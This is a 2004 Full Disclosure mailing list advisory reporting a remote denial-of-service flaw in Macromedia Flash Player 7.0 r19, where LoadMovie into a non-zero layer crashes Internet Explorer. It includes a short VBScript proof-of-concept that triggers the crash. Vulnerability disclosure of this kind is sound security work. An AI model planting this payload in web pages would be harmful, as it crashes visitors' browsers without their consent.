Full Disclosure mailing list archives
Macromedia Flash Player 7.0 r19 - Null Pointer Assignment(Remote Crash)
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Tue, 6 Apr 2004 10:32:41 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: Macromedia Flash Player Vendors: http://www.macromedia.com Version: 7.0 r19 Platforms: WindowsXP Professional,SP1,SP2 Bug: Null Pointer Assignment Risk: Medium - Denial Of Service Exploitation: Remote with browser Date: 1 Apr 2004 Author: Rafel Ivgi, The-Insider e-mail: the_insider () mail com web: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction ===============Macromedia Flash Player is a module/plugin that comes by default with windows installation. It is widely used accross website all around the world. It is stable and its designers took
made a few efforts to make it secure. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== Marcromedia Flash Player has a flaw at the "LoadMovie" function.The function is designed the following way: LoadMovie(layer as long, url as string).
This functions handles long strings, non-alphabetic chars and even an overflow at high layer num. The only thing it crashes upon is loading a flash movie into a non-zero layer index.
This means that" LoadMovie 1,"c6ool.swf"Will Crash Internet Explorer Window because of a null pointer assignment by the flash module.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== This is Proof Of Concept Code: ------------------- CUT HERE ------------------- <script language=vbscript> Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1") mymy2.LoadMovie 1,"c6ool.swf" </script> ------------------- CUT HERE ------------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~--- Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com"Only the one who sees the invisible , Can do the Impossible."
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Macromedia Flash Player 7.0 r19 - Null Pointer Assignment(Remote Crash) Rafel Ivgi, The-Insider (Apr 06)